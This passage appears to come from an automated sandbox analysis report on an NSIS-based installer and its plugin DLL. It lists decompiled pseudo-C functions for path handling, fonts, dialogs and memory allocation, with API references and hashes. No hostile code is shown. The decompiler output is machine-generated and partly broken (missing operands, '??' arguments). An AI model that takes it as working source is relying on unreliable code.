                                                            								GlobalFree(_t67);
                                                            							}
                                                            							goto L26;
                                                            						}
                                                            						_t36 = _t30 - 4;
                                                            						if(_t36 == 0) {
                                                            							L15:
                                                            							GlobalFree(E73C2157E(E73C214E2( *_t80 - 0x30)));
                                                            							_t80 = _t80 + 1;
                                                            							goto L26;
                                                            						}
                                                            						_t43 = _t36;
                                                            						if(_t43 == 0) {
                                                            							L13:
                                                            							GlobalFree(E73C215C7( *_t80 - 0x30, E73C2152B()));
                                                            							_t80 = _t80 + 1;
                                                            							L11:
                                                            							_t83 = _v0;
                                                            							goto L26;
                                                            						}
                                                            						L8:
                                                            						if(_t43 != 1) {
                                                            							goto L26;
                                                            						}
                                                            						_t88 = GlobalAlloc(0x40, _t83 + 4);
                                                            						_t11 = _t88 + 4; // 0x4
                                                            						E73C212FA(_t11,  *0x73c25038, _v0);
                                                            						 *_t88 =  *0x73c25010;
                                                            						 *0x73c25010 = _t88;
                                                            						L10:
                                                            						_t92 = _t92 + 0xc;
                                                            						goto L11;
                                                            					}
                                                            					if(_t94 == 0) {
                                                            						_t74 =  *0x73c2503c;
                                                            						_t85 =  *_t74;
                                                            						 *_t74 =  *_t85;
                                                            						_t75 = _v0;
                                                            						_t52 =  *((intOrPtr*)(_t75 + 0xc));
                                                            						_a12 = _t52;
                                                            						if( *((char*)(_t85 + 4)) == 0x1e) {
                                                            							E73C212FA(_t75, _t85 + 6, 0x38);
                                                            							_t75 = _v0;
                                                            							_t92 = _t92 + 0xc;
                                                            							_t52 = _a12;
                                                            						}
                                                            						 *((intOrPtr*)(_t75 + 0xc)) = _t52;
                                                            						GlobalFree(_t85);
                                                            						goto L11;
                                                            					}
                                                            					_t56 = _t29 - 0x46;
                                                            					if(_t56 == 0) {
                                                            						_t89 = GlobalAlloc(0x40,  *0x73c25040 + 8);
                                                            						 *((intOrPtr*)(_t89 + 4)) = 0x1e;
                                                            						_t14 = _t89 + 6; // 0x6
                                                            						E73C212FA(_t14, _v0, 0x38);
                                                            						 *_t89 =  *( *0x73c2503c);
                                                            						 *( *0x73c2503c) = _t89;
                                                            						goto L10;
                                                            					}
                                                            					_t62 = _t56 - 6;
                                                            					if(_t62 == 0) {
                                                            						goto L24;
                                                            					}
                                                            					_t63 = _t62 - 4;
                                                            					if(_t63 == 0) {
                                                            						 *_t80 =  *_t80 + 0xa;
                                                            						goto L15;
                                                            					}
                                                            					_t43 = _t63;
                                                            					if(_t43 == 0) {
                                                            						 *_t80 =  *_t80 + 0xa;
                                                            						goto L13;
                                                            					}
                                                            					goto L8;
                                                            					L26:
                                                            					_t66 =  *_t80;
                                                            				} while (_t66 != 0);
                                                            				_t90 = _a8;
                                                            				goto L28;
                                                            			}

                                                            APIs
                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 73C21163
                                                            • GlobalFree.KERNEL32(00000000), ref: 73C211B0
                                                            • GlobalFree.KERNEL32(00000000), ref: 73C211CD
                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 73C211E0
                                                            • GlobalFree.KERNEL32 ref: 73C21249
                                                            • GlobalFree.KERNEL32(?), ref: 73C21297
                                                            • GlobalFree.KERNEL32(00000000), ref: 73C212A8
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1326511845.0000000073C21000.00000020.00000001.01000000.00000007.sdmp, Offset: 73C20000, based on PE: true
                                                            • Associated: 00000009.00000002.1326498896.0000000073C20000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000009.00000002.1326522491.0000000073C24000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000009.00000002.1326541140.0000000073C26000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_73c20000_file.jbxd
                                                            Similarity
                                                            • API ID: Global$Free$Alloc
                                                            • String ID:
                                                            • API String ID: 1780285237-0
                                                            • Opcode ID: e09b2e90db83a55cc885c5158508de348d94e4909bb470ef6077072935ca981c
                                                            • Instruction ID: 2b81290e808fdc0253d494635d262b8392506edb6100a1e7eb1e855cda479bef
                                                            • Opcode Fuzzy Hash: e09b2e90db83a55cc885c5158508de348d94e4909bb470ef6077072935ca981c
                                                            • Instruction Fuzzy Hash: 1E51ADB2414381AFD301DF69CC90B6ABFF8FB19206F254469F98ADB291D732E900CB51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00406535(CHAR* _a4) {
                                                            				char _t5;
                                                            				char _t7;
                                                            				char* _t15;
                                                            				char* _t16;
                                                            				CHAR* _t17;
                                                            
                                                            				_t17 = _a4;
                                                            				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
                                                            					_t17 =  &(_t17[4]);
                                                            				}
                                                            				if( *_t17 != 0 && E00405C56(_t17) != 0) {
                                                            					_t17 =  &(_t17[2]);
                                                            				}
                                                            				_t5 =  *_t17;
                                                            				_t15 = _t17;
                                                            				_t16 = _t17;
                                                            				if(_t5 != 0) {
                                                            					do {
                                                            						if(_t5 > 0x1f &&  *((char*)(E00405C14("*?|<>/\":", _t5))) == 0) {
                                                            							E00405DA5(_t16, _t17, CharNextA(_t17) - _t17);
                                                            							_t16 = CharNextA(_t16);
                                                            						}
                                                            						_t17 = CharNextA(_t17);
                                                            						_t5 =  *_t17;
                                                            					} while (_t5 != 0);
                                                            				}
                                                            				 *_t16 =  *_t16 & 0x00000000;
                                                            				while(1) {
                                                            					_t16 = CharPrevA(_t15, _t16);
                                                            					_t7 =  *_t16;
                                                            					if(_t7 != 0x20 && _t7 != 0x5c) {
                                                            						break;
                                                            					}
                                                            					 *_t16 =  *_t16 & 0x00000000;
                                                            					if(_t15 < _t16) {
                                                            						continue;
                                                            					}
                                                            					break;
                                                            				}
                                                            				return _t7;
                                                            			}









                                                            APIs
                                                            • CharNextA.USER32(0000000B), ref: 0040658D
                                                            • CharNextA.USER32(0000000B), ref: 0040659A
                                                            • CharNextA.USER32(0000000B), ref: 0040659F
                                                            • CharPrevA.USER32(0000000B,0000000B), ref: 004065AF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Char$Next$Prev
                                                            • String ID: *?|<>/":
                                                            • API String ID: 589700163-165019052
                                                            • Opcode ID: 28daa348592e837642e08a63fb50167dd7553375ed6c1e47afa6a3256008987e
                                                            • Instruction ID: f1a46c244338e9c327de57877a99ef2f1f2ce6c7380876dc27bda46ebf0462ee
                                                            • Opcode Fuzzy Hash: 28daa348592e837642e08a63fb50167dd7553375ed6c1e47afa6a3256008987e
                                                            • Instruction Fuzzy Hash: 671134918047903DFB3216386C04B776FC94F9B760F5A007BE4C2722CAC63C5CA6826D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 77%
                                                            			E00401D65(void* __ebx, void* __edx) {
                                                            				struct HWND__* _t30;
                                                            				CHAR* _t38;
                                                            				void* _t48;
                                                            				void* _t53;
                                                            				signed int _t55;
                                                            				signed int _t58;
                                                            				long _t61;
                                                            				void* _t65;
                                                            
                                                            				_t53 = __ebx;
                                                            				if(( *(_t65 - 0x1b) & 0x00000001) == 0) {
                                                            					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x20));
                                                            				} else {
                                                            					E00402C17(2);
                                                            					 *((intOrPtr*)(__ebp - 0x38)) = __edx;
                                                            				}
                                                            				_t55 =  *(_t65 - 0x1c);
                                                            				 *(_t65 + 8) = _t30;
                                                            				_t58 = _t55 & 0x00000004;
                                                            				 *(_t65 - 0xc) = _t55 & 0x00000003;
                                                            				 *(_t65 - 0x34) = _t55 >> 0x1f;
                                                            				 *(_t65 - 0x30) = _t55 >> 0x0000001e & 0x00000001;
                                                            				if((_t55 & 0x00010000) == 0) {
                                                            					_t38 =  *(_t65 - 0x24) & 0x0000ffff;
                                                            				} else {
                                                            					_t38 = E00402C39(0x11);
                                                            				}
                                                            				 *(_t65 - 8) = _t38;
                                                            				GetClientRect( *(_t65 + 8), _t65 - 0x84);
                                                            				asm("sbb edi, edi");
                                                            				_t61 = LoadImageA( ~_t58 &  *0x452420,  *(_t65 - 8),  *(_t65 - 0xc),  *(_t65 - 0x7c) *  *(_t65 - 0x34),  *(_t65 - 0x78) *  *(_t65 - 0x30),  *(_t65 - 0x1c) & 0x0000fef0);
                                                            				_t48 = SendMessageA( *(_t65 + 8), 0x172,  *(_t65 - 0xc), _t61);
                                                            				if(_t48 != _t53 &&  *(_t65 - 0xc) == _t53) {
                                                            					DeleteObject(_t48);
                                                            				}
                                                            				if( *((intOrPtr*)(_t65 - 0x28)) >= _t53) {
                                                            					_push(_t61);
                                                            					E004061B5();
                                                            				}
                                                            				 *0x4524a8 =  *0x4524a8 +  *((intOrPtr*)(_t65 - 4));
                                                            				return 0;
                                                            			}












                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                            • String ID:
                                                            • API String ID: 1849352358-0
                                                            • Opcode ID: a576bf6efa7c2fb23105444ffa85423c352b0735285158bf1a86dfd814425e5e
                                                            • Instruction ID: e108dfa7ff8bed4c569463ce295f5c853ec5e47b290a4dfb9769ed3a77c2d4ca
                                                            • Opcode Fuzzy Hash: a576bf6efa7c2fb23105444ffa85423c352b0735285158bf1a86dfd814425e5e
                                                            • Instruction Fuzzy Hash: 63213B72E00109AFDF15DFA4DD85AAEBBB5EB48300F24407EF901F62A1DB789941DB14
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 73%
                                                            			E00401E35(intOrPtr __edx) {
                                                            				void* __esi;
                                                            				int _t9;
                                                            				signed char _t15;
                                                            				struct HFONT__* _t18;
                                                            				intOrPtr _t30;
                                                            				struct HDC__* _t31;
                                                            				void* _t33;
                                                            				void* _t35;
                                                            
                                                            				_t30 = __edx;
                                                            				_t31 = GetDC( *(_t35 - 8));
                                                            				_t9 = E00402C17(2);
                                                            				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
                                                            				0x414438->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
                                                            				ReleaseDC( *(_t35 - 8), _t31);
                                                            				 *0x414448 = E00402C17(3);
                                                            				_t15 =  *((intOrPtr*)(_t35 - 0x18));
                                                            				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
                                                            				 *0x41444f = 1;
                                                            				 *0x41444c = _t15 & 0x00000001;
                                                            				 *0x41444d = _t15 & 0x00000002;
                                                            				 *0x41444e = _t15 & 0x00000004;
                                                            				E004062EA(_t9, _t31, _t33, 0x414454,  *((intOrPtr*)(_t35 - 0x24)));
                                                            				_t18 = CreateFontIndirectA(0x414438);
                                                            				_push(_t18);
                                                            				_push(_t33);
                                                            				E004061B5();
                                                            				 *0x4524a8 =  *0x4524a8 +  *((intOrPtr*)(_t35 - 4));
                                                            				return 0;
                                                            			}












                                                            APIs
                                                            • GetDC.USER32(?), ref: 00401E38
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E52
                                                            • MulDiv.KERNEL32 ref: 00401E5A
                                                            • ReleaseDC.USER32(?,00000000), ref: 00401E6B
                                                            • CreateFontIndirectA.GDI32(00414438), ref: 00401EBA
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                                            • String ID:
                                                            • API String ID: 3808545654-0
                                                            • Opcode ID: e89e6eedd1c15f4ce250c8d11fd485d8fe03999d8a0dbcf2c806e51525b441ac
                                                            • Instruction ID: 8ddd809678b75effdda657bd79c7971a8a008a3e86d82937076eaa48eaf57caa
                                                            • Opcode Fuzzy Hash: e89e6eedd1c15f4ce250c8d11fd485d8fe03999d8a0dbcf2c806e51525b441ac
                                                            • Instruction Fuzzy Hash: 8D01B571504240AFE7006BB0EE4ABDD7FF49B95319F14447DF281B71E2CA7804898B2D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 77%
                                                            			E00404B1D(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                                            				char _v36;
                                                            				char _v68;
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				signed int _t21;
                                                            				signed int _t22;
                                                            				void* _t29;
                                                            				void* _t31;
                                                            				void* _t32;
                                                            				void* _t41;
                                                            				signed int _t43;
                                                            				signed int _t47;
                                                            				signed int _t50;
                                                            				signed int _t51;
                                                            				signed int _t53;
                                                            
                                                            				_t21 = _a16;
                                                            				_t51 = _a12;
                                                            				_t41 = 0xffffffdc;
                                                            				if(_t21 == 0) {
                                                            					_push(0x14);
                                                            					_pop(0);
                                                            					_t22 = _t51;
                                                            					if(_t51 < 0x100000) {
                                                            						_push(0xa);
                                                            						_pop(0);
                                                            						_t41 = 0xffffffdd;
                                                            					}
                                                            					if(_t51 < 0x400) {
                                                            						_t41 = 0xffffffde;
                                                            					}
                                                            					if(_t51 < 0xffff3333) {
                                                            						_t50 = 0x14;
                                                            						asm("cdq");
                                                            						_t22 = 1 / _t50 + _t51;
                                                            					}
                                                            					_t23 = _t22 & 0x00ffffff;
                                                            					_t53 = _t22 >> 0;
                                                            					_t43 = 0xa;
                                                            					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
                                                            				} else {
                                                            					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
                                                            					_t47 = 0;
                                                            				}
                                                            				_t29 = E004062EA(_t41, _t47, _t53,  &_v36, 0xffffffdf);
                                                            				_t31 = E004062EA(_t41, _t47, _t53,  &_v68, _t41);
                                                            				_t32 = E004062EA(_t41, _t47, 0x43c090, 0x43c090, _a8);
                                                            				wsprintfA(_t32 + lstrlenA(0x43c090), "%u.%u%s%s", _t53, _t47, _t31, _t29);
                                                            				return SetDlgItemTextA( *0x44e3f8, _a4, 0x43c090);
                                                            			}




















                                                            APIs
                                                            • lstrlenA.KERNEL32(0043C090,0043C090,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A38,000000DF,00000000,00000400,?), ref: 00404BBB
                                                            • wsprintfA.USER32 ref: 00404BC3
                                                            • SetDlgItemTextA.USER32(?,0043C090), ref: 00404BD6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: ItemTextlstrlenwsprintf
                                                            • String ID: %u.%u%s%s
                                                            • API String ID: 3540041739-3551169577
                                                            • Opcode ID: ef18dc2ada111650a354b4d1e8e6ccd4a0c7f7449d403410ef4590da8fa39622
                                                            • Instruction ID: 7c3cbaaa6cddaf4418f9485f50c6cec2219b2b57f28ad8e3923d4dc00c9a2874
                                                            • Opcode Fuzzy Hash: ef18dc2ada111650a354b4d1e8e6ccd4a0c7f7449d403410ef4590da8fa39622
                                                            • Instruction Fuzzy Hash: 7811E773A0412867DB00766D9C41FAF3298DB85374F25027BFA26F31D1E978DC1282A8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 59%
                                                            			E00401C2E(intOrPtr __edx) {
                                                            				int _t29;
                                                            				long _t30;
                                                            				signed int _t32;
                                                            				CHAR* _t35;
                                                            				long _t36;
                                                            				int _t41;
                                                            				signed int _t42;
                                                            				int _t46;
                                                            				int _t56;
                                                            				intOrPtr _t57;
                                                            				struct HWND__* _t61;
                                                            				void* _t64;
                                                            
                                                            				_t57 = __edx;
                                                            				_t29 = E00402C17(3);
                                                            				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
                                                            				 *(_t64 - 8) = _t29;
                                                            				_t30 = E00402C17(4);
                                                            				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
                                                            				 *(_t64 + 8) = _t30;
                                                            				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
                                                            					 *((intOrPtr*)(__ebp - 8)) = E00402C39(0x33);
                                                            				}
                                                            				__eflags =  *(_t64 - 0x14) & 0x00000002;
                                                            				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
                                                            					 *(_t64 + 8) = E00402C39(0x44);
                                                            				}
                                                            				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
                                                            				_push(1);
                                                            				if(__eflags != 0) {
                                                            					_t59 = E00402C39();
                                                            					_t32 = E00402C39();
                                                            					asm("sbb ecx, ecx");
                                                            					asm("sbb eax, eax");
                                                            					_t35 =  ~( *_t31) & _t59;
                                                            					__eflags = _t35;
                                                            					_t36 = FindWindowExA( *(_t64 - 8),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
                                                            					goto L10;
                                                            				} else {
                                                            					_t61 = E00402C17();
                                                            					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
                                                            					_t41 = E00402C17(2);
                                                            					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
                                                            					_t56 =  *(_t64 - 0x14) >> 2;
                                                            					if(__eflags == 0) {
                                                            						_t36 = SendMessageA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8));
                                                            						L10:
                                                            						 *(_t64 - 0xc) = _t36;
                                                            					} else {
                                                            						_t42 = SendMessageTimeoutA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8), _t46, _t56, _t64 - 0xc);
                                                            						asm("sbb eax, eax");
                                                            						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                                                            					}
                                                            				}
                                                            				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
                                                            				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
                                                            					_push( *(_t64 - 0xc));
                                                            					E004061B5();
                                                            				}
                                                            				 *0x4524a8 =  *0x4524a8 +  *((intOrPtr*)(_t64 - 4));
                                                            				return 0;
                                                            			}
















                                                            APIs
                                                            • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C9E
                                                            • SendMessageA.USER32 ref: 00401CB6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Timeout
                                                            • String ID: !
                                                            • API String ID: 1777923405-2657877971
                                                            • Opcode ID: a2a89bb8462c7151f84b5e8a0709187cefd4722cf5762b3f674c81304cb6edd9
                                                            • Instruction ID: fb252943c263502b915e172e451356f37a414cf8932e3a565ad31ae7147df210
                                                            • Opcode Fuzzy Hash: a2a89bb8462c7151f84b5e8a0709187cefd4722cf5762b3f674c81304cb6edd9
                                                            • Instruction Fuzzy Hash: E2217371948208BEEB059FB5DA86AAD7FB4EF45304F10447EF101B61D1D7B989819B18
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00402EA8(intOrPtr _a4) {
                                                            				long _t2;
                                                            				struct HWND__* _t3;
                                                            				struct HWND__* _t6;
                                                            
                                                            				if(_a4 == 0) {
                                                            					if( *0x432048 == 0) {
                                                            						_t2 = GetTickCount();
                                                            						if(_t2 >  *0x45242c) {
                                                            							_t3 = CreateDialogParamA( *0x452420, 0x6f, 0, E00402E25, 0);
                                                            							 *0x432048 = _t3;
                                                            							return ShowWindow(_t3, 5);
                                                            						}
                                                            						return _t2;
                                                            					} else {
                                                            						return E0040669F(0);
                                                            					}
                                                            				} else {
                                                            					_t6 =  *0x432048;
                                                            					if(_t6 != 0) {
                                                            						_t6 = DestroyWindow(_t6);
                                                            					}
                                                            					 *0x432048 = 0;
                                                            					return _t6;
                                                            				}
                                                            			}







                                                            APIs
                                                            • DestroyWindow.USER32 ref: 00402EBB
                                                            • GetTickCount.KERNEL32(00000000,00403086,00000001,?,?,004036FD,?,?,00000007,00000009,0000000B), ref: 00402ED9
                                                            • CreateDialogParamA.USER32(0000006F,00000000,00402E25,00000000), ref: 00402EF6
                                                            • ShowWindow.USER32(00000000,00000005), ref: 00402F04
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                            • String ID:
                                                            • API String ID: 2102729457-0
                                                            • Opcode ID: 215ea6209036c334194e630b3a6d8c331bd9e7ebc391d59cacfd35bfdff6c725
                                                            • Instruction ID: f2601d1978d4935414455477ceead43ade8f8f36080c659767c01e9f51b987ab
                                                            • Opcode Fuzzy Hash: 215ea6209036c334194e630b3a6d8c331bd9e7ebc391d59cacfd35bfdff6c725
                                                            • Instruction Fuzzy Hash: 12F05E31441A20ABC6216B60FF8C99B7B74A705B12B21583AF105B11F6C6B84889CBEC
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E73C21E71(intOrPtr _a4, CHAR* _a8) {
                                                            				intOrPtr _t11;
                                                            				intOrPtr _t19;
                                                            				CHAR* _t21;
                                                            
                                                            				_t11 = _a4;
                                                            				if( *((intOrPtr*)(_t11 + 4)) != 1) {
                                                            					_t21 = _a8;
                                                            					_t13 =  ==  ? 0x73c240c4 : 0x73c240bc;
                                                            					lstrcpyA(_t21,  ==  ? 0x73c240c4 : 0x73c240bc);
                                                            				} else {
                                                            					_t19 =  *((intOrPtr*)(_t11 + 0x1498));
                                                            					if(( *(_t11 + 0x810) & 0x00000100) != 0) {
                                                            						_t19 =  *((intOrPtr*)( *((intOrPtr*)(_t11 + 0x80c)) + 1));
                                                            					}
                                                            					_t21 = _a8;
                                                            					wsprintfA(_t21, "callback%d", _t19);
                                                            				}
                                                            				return _t21;
                                                            			}







                                                            APIs
                                                            • wsprintfA.USER32 ref: 73C21EA4
                                                            • lstrcpyA.KERNEL32(?,error,00000818,73C216E5,00000000,?), ref: 73C21EC4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1326511845.0000000073C21000.00000020.00000001.01000000.00000007.sdmp, Offset: 73C20000, based on PE: true
                                                            • Associated: 00000009.00000002.1326498896.0000000073C20000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000009.00000002.1326522491.0000000073C24000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000009.00000002.1326541140.0000000073C26000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_73c20000_file.jbxd
                                                            Similarity
                                                            • API ID: lstrcpywsprintf
                                                            • String ID: callback%d$error
                                                            • API String ID: 2408954437-1307476583
                                                            • Opcode ID: 44ccfd4956e661cda1382f2e699591bee88271269be0fab78eba5215238b1474
                                                            • Instruction ID: 92e5d6dc0f7f20e5c50c3688c56bbee2571a5c8592e9806ecfba2d5649736dfb
                                                            • Opcode Fuzzy Hash: 44ccfd4956e661cda1382f2e699591bee88271269be0fab78eba5215238b1474
                                                            • Instruction Fuzzy Hash: DBF0D4312041209FC705DB49DC58FAA77EAFF85312F1985A8F94ADB251C770AC818B96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 53%
                                                            			E00405CD7(void* __eflags, intOrPtr _a4) {
                                                            				int _t11;
                                                            				signed char* _t12;
                                                            				intOrPtr _t18;
                                                            				intOrPtr* _t21;
                                                            				void* _t22;
                                                            
                                                            				E00406257(0x446098, _a4);
                                                            				_t21 = E00405C82(0x446098);
                                                            				if(_t21 != 0) {
                                                            					E00406535(_t21);
                                                            					if(( *0x452438 & 0x00000080) == 0) {
                                                            						L5:
                                                            						_t22 = _t21 - 0x446098;
                                                            						while(1) {
                                                            							_t11 = lstrlenA(0x446098);
                                                            							_push(0x446098);
                                                            							if(_t11 <= _t22) {
                                                            								break;
                                                            							}
                                                            							_t12 = E004065CE();
                                                            							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                                                            								E00405C30(0x446098);
                                                            								continue;
                                                            							} else {
                                                            								goto L1;
                                                            							}
                                                            						}
                                                            						E00405BE9();
                                                            						return 0 | GetFileAttributesA(??) != 0xffffffff;
                                                            					}
                                                            					_t18 =  *_t21;
                                                            					if(_t18 == 0 || _t18 == 0x5c) {
                                                            						goto L1;
                                                            					} else {
                                                            						goto L5;
                                                            					}
                                                            				}
                                                            				L1:
                                                            				return 0;
                                                            			}









                                                            APIs
                                                              • Part of subcall function 00406257: lstrcpynA.KERNEL32(0000000B,0000000B,00002000,00403556,0044E420,NSIS Error,?,00000007,00000009,0000000B), ref: 00406264
                                                              • Part of subcall function 00405C82: CharNextA.USER32(?), ref: 00405C90
                                                              • Part of subcall function 00405C82: CharNextA.USER32(00000000), ref: 00405C95
                                                              • Part of subcall function 00405C82: CharNextA.USER32(00000000), ref: 00405CA9
                                                            • lstrlenA.KERNEL32(00446098,00000000,00446098,00446098,T'Wu,?,00485000,00405A39,?,75572754,00485000,0047B000), ref: 00405D2A
                                                            • GetFileAttributesA.KERNEL32(00446098,00446098,00446098,00446098,00446098,00446098,00000000,00446098,00446098,T'Wu,?,00485000,00405A39,?,75572754,00485000), ref: 00405D3A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                            • String ID: T'Wu
                                                            • API String ID: 3248276644-2377931180
                                                            • Opcode ID: d5ae26ad5e185ccb9d41ab4008376a2a7eec6025898b03740fa4c655be68b4f9
                                                            • Instruction ID: ca67251d285f136759c69e236b036a1895e73ffa9f1d75b438997b26ec9dd8f6
                                                            • Opcode Fuzzy Hash: d5ae26ad5e185ccb9d41ab4008376a2a7eec6025898b03740fa4c655be68b4f9
                                                            • Instruction Fuzzy Hash: 12F02825108F6526E72632391D09AAF0A45CE93324719453FFCA2B62C2DA3C89429E6E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 89%
                                                            			E004052EC(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                            				int _t15;
                                                            				long _t16;
                                                            
                                                            				_t15 = _a8;
                                                            				if(_t15 != 0x102) {
                                                            					if(_t15 != 0x200) {
                                                            						_t16 = _a16;
                                                            						L7:
                                                            						if(_t15 == 0x419 &&  *0x43c07c != _t16) {
                                                            							_push(_t16);
                                                            							_push(6);
                                                            							 *0x43c07c = _t16;
                                                            							E00404CA7();
                                                            						}
                                                            						L11:
                                                            						return CallWindowProcA( *0x43c084, _a4, _t15, _a12, _t16);
                                                            					}
                                                            					if(IsWindowVisible(_a4) == 0) {
                                                            						L10:
                                                            						_t16 = _a16;
                                                            						goto L11;
                                                            					}
                                                            					_t16 = E00404C27(_a4, 1);
                                                            					_t15 = 0x419;
                                                            					goto L7;
                                                            				}
                                                            				if(_a12 != 0x20) {
                                                            					goto L10;
                                                            				}
                                                            				E00404320(0x413);
                                                            				return 0;
                                                            			}






                                                            APIs
                                                            • IsWindowVisible.USER32(?), ref: 0040531B
                                                            • CallWindowProcA.USER32(?,?,?,?), ref: 0040536C
                                                              • Part of subcall function 00404320: SendMessageA.USER32 ref: 00404332
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Window$CallMessageProcSendVisible
                                                            • String ID:
                                                            • API String ID: 3748168415-3916222277
                                                            • Opcode ID: 55b41b329312dcc7f374a5f01e52e89ce4d23385b54215be366866303fde3b52
                                                            • Instruction ID: 1a66df526f819bcac04dd73860a054bf484f2535563b1484c434c9e94afb1d49
                                                            • Opcode Fuzzy Hash: 55b41b329312dcc7f374a5f01e52e89ce4d23385b54215be366866303fde3b52
                                                            • Instruction Fuzzy Hash: 34017C72104608EBEF206F61ED91AAB372AEB84395F145037FE05751D0C7BA8D929F29
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 90%
                                                            			E0040613E(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, char* _a16, signed int _a20) {
                                                            				int _v8;
                                                            				long _t21;
                                                            				long _t24;
                                                            				char* _t30;
                                                            
                                                            				asm("sbb eax, eax");
                                                            				_v8 = 0x2000;
                                                            				_t21 = E004060DD(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
                                                            				_t30 = _a16;
